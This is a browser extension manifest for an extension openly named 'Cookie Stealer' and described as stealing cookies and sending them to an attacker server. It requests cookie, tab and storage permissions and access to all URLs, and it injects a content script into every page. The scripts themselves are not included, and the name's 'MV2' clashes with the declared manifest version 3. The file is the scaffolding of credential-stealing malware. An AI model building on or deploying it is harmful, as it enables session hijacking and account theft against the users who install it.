{
  "manifest_version": 3,
  "name": "Cookie Stealer MV2",
  "description": "Steal cookies and send to attacker server",
  "version": "1.0.0",
  "permissions": [
    "cookies",
    "tabs",
    "storage"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "content.js"
      ],
      "run_at": "document_idle"
    }
  ],
  "host_permissions": [
    "<all_urls>"
  ]
}